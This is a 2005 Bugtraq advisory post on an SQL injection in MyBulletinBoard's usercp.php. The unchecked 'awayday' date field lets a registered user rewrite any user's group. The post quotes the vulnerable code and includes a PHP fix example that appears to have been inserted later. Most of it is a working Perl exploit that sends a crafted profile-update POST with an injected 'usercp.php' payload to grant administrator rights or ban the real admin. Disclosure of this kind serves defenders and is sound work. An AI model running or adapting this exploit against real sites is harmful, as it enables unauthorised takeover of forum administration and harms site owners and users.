Message-ID: <op.sy8twtgumkj3qh@home-apqx014qil>
Date: Wed, 26 Oct 2005 13:01:31 +0500
From: Animal <cOre@...er.ru>
To: bugtraq@...urityfocus.com
Subject: SQL-Injection in MyBulletinBoard allows attacker to become a board admin.


Vendor:  www.mybboard.com
Version: 1.00 Preview Release 2, RC4 and maybe prior.
Script:  usercp.php
Code:
>  if($mybb->input['away'] == "yes" && $mybb->settings['allowaway'] != "no")
>        {
>     [...]
>         $returndate = $mybb->input['awayday']."-".$mybb->input['awaymonth']."-".$mybb->input['awayyear'];
>     [...]
>      $newprofile = array(
>               "website" => addslashes(htmlspecialchars($mybb->input['website'])),
>               "icq" => intval($mybb->input['icq']),
>               "aim" => addslashes(htmlspecialchars($mybb->input['aim'])),
>               "yahoo" => addslashes(htmlspecialchars($mybb->input['yahoo'])),
>               "msn" => addslashes(htmlspecialchars($mybb->input['msn'])),
>               "birthday" => $bday,
>               "away" => $away,
>               "awaydate" => $awaydate,
>               "returndate" => $returndate,   // <--- not checked (bday too, but anyway)
>               "awayreason" => addslashes(htmlspecialchars($mybb->input['awayreason']))
>               );
>     [...]
>      $db->update_query(TABLE_PREFIX."users", $newprofile, "uid='".$mybb->user['uid']."'");
So: an attacker can replace the "awayday" parameter with SQL code and change
any field in the _users table for his own row. Setting "usergroup" for his
"uid" to 4 makes him an admin. To use this bug the attacker has to be a
registered or awaiting-activation user.
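One way to close the hole in the code quoted above, as an added example (not MyBB's own code or patch): build $returndate only from digit-checked day/month/year parts, so no attacker-controlled string ever reaches the SET clause. It assumes a plain $input array in place of $mybb->input, takes $away from the caller as the original script does, and keeps the original addslashes() escaping for the free-text fields.

```php
<?php
// Added example, not MyBB's code: the original usercp.php concatenated the raw
// awayday/awaymonth/awayyear strings into $returndate, which update_query then
// placed in the SET clause unescaped. Validate instead of concatenating.

/**
 * Returns "d-m-Y" built from digit-checked parts, or null when any part is
 * missing, not a plain decimal string, or not a real calendar date.
 */
function build_returndate(array $input): ?string
{
    foreach (['awayday', 'awaymonth', 'awayyear'] as $key) {
        // ctype_digit rejects quotes, spaces, commas and comment markers,
        // so nothing but digits can reach the query.
        if (!isset($input[$key]) || !ctype_digit((string) $input[$key])) {
            return null;
        }
    }
    $day   = (int) $input['awayday'];
    $month = (int) $input['awaymonth'];
    $year  = (int) $input['awayyear'];
    if (!checkdate($month, $day, $year)) {
        return null;
    }
    return sprintf('%d-%d-%d', $day, $month, $year);
}

/**
 * Hardened replacement for the $newprofile block: free-text fields are escaped
 * as before, date fields are validated, and a bad date rejects the update.
 */
function build_newprofile(array $input, string $away): ?array
{
    $returndate = build_returndate($input);
    if ($away === 'yes' && $returndate === null) {
        return null;   // do not store a profile with a malformed date
    }
    return [
        'icq'        => intval($input['icq'] ?? 0),
        'away'       => $away,
        'returndate' => $returndate ?? '',
        'awayreason' => addslashes(htmlspecialchars($input['awayreason'] ?? '')),
    ];
}

// Constructed inputs: a valid date passes, a quote in the day field does not.
var_dump(build_returndate(['awayday' => '1', 'awaymonth' => '1', 'awayyear' => '2009']));
var_dump(build_returndate(['awayday' => "1'", 'awaymonth' => '1', 'awayyear' => '2009']));
```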

Proof of concept: (For PR2 only)
--<-->--<-->--<-->--<-->--<-->--[START]--<-->--<-->--<-->--<-->--<-->--
#!/usr/bin/perl

###   MyBB Preview Release 2 SQL-Injection PoC ExPlOiT   ###
###   ------------------------------------------------   ###
###   To use this you have to be registered member on    ###
###   a target.                                          ###
###   ------------------------------------------------   ###
###   Glossary:                                          ###
###     [MYBBUSER] - name of the field in cookie;        ###
###     [YOUR_ID]  - your uid :)                         ###
###     [ID]       - victim uid                          ###
###   Available groups:                                  ###
###     1 - Unregistered / Not Logged In                 ###
###     2 - Registered                                   ###
###     3 - Super Moderators                             ###
###     4 - Administrators                               ###
###     5 - Awayting Activation                          ###
###     6 - Moderators                                   ###
###     7 - Banned                                       ###
###   ------------------------------------------------   ###
###   Examples:                                          ###
###    1) TROUBLE --> U need an admin privileges.        ###
###       USAGE --> mybbpr2.pl -u [MYBBUSER] -i          ###
###                 [YOUR_ID] -g 4 server /mybb/         ###
###    2) TROUBLE --> U need to ban real admin.          ###
###       USAGE --> mybbpr2.pl -u [MYBBUSER] -i          ###
###                 [ID] -g 7 server /mybb/              ###

use IO::Socket;

$tmp=0;

while($tmp<@ARGV)
{
  if($ARGV[$tmp] eq "-u")
   {
    $mbuser=$ARGV[$tmp+1];
    $tmp++;
   }
  if($ARGV[$tmp] eq "-i")
   {
    $id=$ARGV[$tmp+1];
    $tmp++;
   }
  if($ARGV[$tmp] eq "-g")
   {
    $ugr=$ARGV[$tmp+1];
    $tmp++;
   }
  if($ARGV[$tmp] eq "-h")
   {
    &f_help();
   }
  $tmp++;
}

$target=$ARGV[@ARGV-2];
$path  =$ARGV[@ARGV-1];

if(!$mbuser || !$id || !$ugr)
{
  &f_die("Some options aren't specified");
}
print "\r\n Attacking http://$target\r\n";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$target", PeerPort => "80") || &f_die("Can't connect to $target");
$str="bday1=&bday2=&bday3=&website=&fid3=Undisclosed&fid1=&fid2=&usertitle=&icq=&aim=&msn=&yahoo=&away=yes&awayreason=Hacking+The+World&awayday=1-1-2009%27%2C+usergroup=%27$ugr%27+WHERE+uid=%27$id%27+%2F%2A&awaymonth=1&awayyear=2009&action=do_profile&regsubmit=Update+Profile";

print $sock "POST $path/usercp.php HTTP/1.1\nHost: $target\nAccept: */*\nCookie: mybbuser=$mbuser\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: ".length($str)."\n\n$str\n";
while(<$sock>)
{
  if (/Thank you/i) { print "\r\n Looks like successfully exploited\r\n Just check it.\r\n"; exit(0)}
}
print "\r\n Looks like exploit failed :[\r\n";

#----------------------------------#
#   S  u  B  r  O  u  T  i  N  e   #
#----------------------------------#


sub f_help()
{
print q(
  Usage: mybbpr2.pl <OPTIONS> SERVER PATH
  Options:
   -u USERKEY        mybbuser field from cookie.
   -i UID            User's uid. (Change group 4 this user)
   -g GROUP          New usergroup. (1-7)
   -h                Displays this help.
   );
  exit(-1);
}
#'
sub f_die($)
{
  print "\r\nERROR: $_[0]\r\n";
  exit(-1);
}
--<-->--<-->--<-->--<-->--<-->--[EoF]--<-->--<-->--<-->--<-->--<-->--

Found: 1-3 Sept 2005. Don't remember.
Updated package is available (I hope).

ByE.

